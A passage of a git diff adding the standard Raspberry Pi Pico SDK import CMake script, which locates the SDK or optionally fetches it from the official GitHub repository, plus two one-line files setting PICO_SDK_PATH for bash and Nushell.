SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +if (DEFINED ENV{PICO_SDK_PATH} AND (NOT PICO_SDK_PATH)) + set(PICO_SDK_PATH $ENV{PICO_SDK_PATH}) + message("Using PICO_SDK_PATH from environment ('${PICO_SDK_PATH}')") +endif () + +if (DEFINED ENV{PICO_SDK_FETCH_FROM_GIT} AND (NOT PICO_SDK_FETCH_FROM_GIT)) + set(PICO_SDK_FETCH_FROM_GIT $ENV{PICO_SDK_FETCH_FROM_GIT}) + message("Using PICO_SDK_FETCH_FROM_GIT from environment ('${PICO_SDK_FETCH_FROM_GIT}')") +endif () + +if (DEFINED ENV{PICO_SDK_FETCH_FROM_GIT_PATH} AND (NOT PICO_SDK_FETCH_FROM_GIT_PATH)) + set(PICO_SDK_FETCH_FROM_GIT_PATH $ENV{PICO_SDK_FETCH_FROM_GIT_PATH}) + message("Using PICO_SDK_FETCH_FROM_GIT_PATH from environment ('${PICO_SDK_FETCH_FROM_GIT_PATH}')") +endif () + +if (DEFINED ENV{PICO_SDK_FETCH_FROM_GIT_TAG} AND (NOT PICO_SDK_FETCH_FROM_GIT_TAG)) + set(PICO_SDK_FETCH_FROM_GIT_TAG $ENV{PICO_SDK_FETCH_FROM_GIT_TAG}) + message("Using PICO_SDK_FETCH_FROM_GIT_TAG from environment ('${PICO_SDK_FETCH_FROM_GIT_TAG}')") +endif () + +if (PICO_SDK_FETCH_FROM_GIT AND NOT PICO_SDK_FETCH_FROM_GIT_TAG) + set(PICO_SDK_FETCH_FROM_GIT_TAG "master") + message("Using master as default value for PICO_SDK_FETCH_FROM_GIT_TAG") +endif() + +set(PICO_SDK_PATH "${PICO_SDK_PATH}" CACHE PATH "Path to the Raspberry Pi Pico SDK") +set(PICO_SDK_FETCH_FROM_GIT "${PICO_SDK_FETCH_FROM_GIT}" CACHE BOOL "Set to ON to fetch copy of SDK from git if not otherwise locatable") +set(PICO_SDK_FETCH_FROM_GIT_PATH "${PICO_SDK_FETCH_FROM_GIT_PATH}" CACHE FILEPATH "location to download SDK") +set(PICO_SDK_FETCH_FROM_GIT_TAG "${PICO_SDK_FETCH_FROM_GIT_TAG}" CACHE FILEPATH "release tag for SDK") + +if (NOT PICO_SDK_PATH) + if (PICO_SDK_FETCH_FROM_GIT) + include(FetchContent) + set(FETCHCONTENT_BASE_DIR_SAVE ${FETCHCONTENT_BASE_DIR}) + if (PICO_SDK_FETCH_FROM_GIT_PATH) + get_filename_component(FETCHCONTENT_BASE_DIR "${PICO_SDK_FETCH_FROM_GIT_PATH}" REALPATH BASE_DIR "${CMAKE_SOURCE_DIR}") + endif () + FetchContent_Declare( + pico_sdk + GIT_REPOSITORY https://github.com/raspberrypi/pico-sdk + GIT_TAG ${PICO_SDK_FETCH_FROM_GIT_TAG} + ) + + if (NOT pico_sdk) + message("Downloading Raspberry Pi Pico SDK") + # GIT_SUBMODULES_RECURSE was added in 3.17 + if (${CMAKE_VERSION} VERSION_GREATER_EQUAL "3.17.0") + FetchContent_Populate( + pico_sdk + QUIET + GIT_REPOSITORY https://github.com/raspberrypi/pico-sdk + GIT_TAG ${PICO_SDK_FETCH_FROM_GIT_TAG} + GIT_SUBMODULES_RECURSE FALSE + + SOURCE_DIR ${FETCHCONTENT_BASE_DIR}/pico_sdk-src + BINARY_DIR ${FETCHCONTENT_BASE_DIR}/pico_sdk-build + SUBBUILD_DIR ${FETCHCONTENT_BASE_DIR}/pico_sdk-subbuild + ) + else () + FetchContent_Populate( + pico_sdk + QUIET + GIT_REPOSITORY https://github.com/raspberrypi/pico-sdk + GIT_TAG ${PICO_SDK_FETCH_FROM_GIT_TAG} + + SOURCE_DIR ${FETCHCONTENT_BASE_DIR}/pico_sdk-src + BINARY_DIR ${FETCHCONTENT_BASE_DIR}/pico_sdk-build + SUBBUILD_DIR ${FETCHCONTENT_BASE_DIR}/pico_sdk-subbuild + ) + endif () + + set(PICO_SDK_PATH ${pico_sdk_SOURCE_DIR}) + endif () + set(FETCHCONTENT_BASE_DIR ${FETCHCONTENT_BASE_DIR_SAVE}) + else () + message(FATAL_ERROR + "SDK location was not specified. Please set PICO_SDK_PATH or set PICO_SDK_FETCH_FROM_GIT to on to fetch from git." + ) + endif () +endif () + +get_filename_component(PICO_SDK_PATH "${PICO_SDK_PATH}" REALPATH BASE_DIR "${CMAKE_BINARY_DIR}") +if (NOT EXISTS ${PICO_SDK_PATH}) + message(FATAL_ERROR "Directory '${PICO_SDK_PATH}' not found") +endif () + +set(PICO_SDK_INIT_CMAKE_FILE ${PICO_SDK_PATH}/pico_sdk_init.cmake) +if (NOT EXISTS ${PICO_SDK_INIT_CMAKE_FILE}) + message(FATAL_ERROR "Directory '${PICO_SDK_PATH}' does not appear to contain the Raspberry Pi Pico SDK") +endif () + +set(PICO_SDK_PATH ${PICO_SDK_PATH} CACHE PATH "Path to the Raspberry Pi Pico SDK" FORCE) + +include(${PICO_SDK_INIT_CMAKE_FILE}) diff --git a/sdk.env b/sdk.env new file mode 100644 index 0000000..fe93277 --- /dev/null +++ b/sdk.env @@ -0,0 +1 @@ +export PICO_SDK_PATH=/home/ity/Repos/pico-sdk diff --git a/sdk.nu b/sdk.nu new file mode 100644 index 0000000..43f6752 --- /dev/null +++ b/sdk.nu @@ -0,0 +1 @@ +$env.PICO_SDK_PATH = '/home/ity/Repos/pico-sdk/'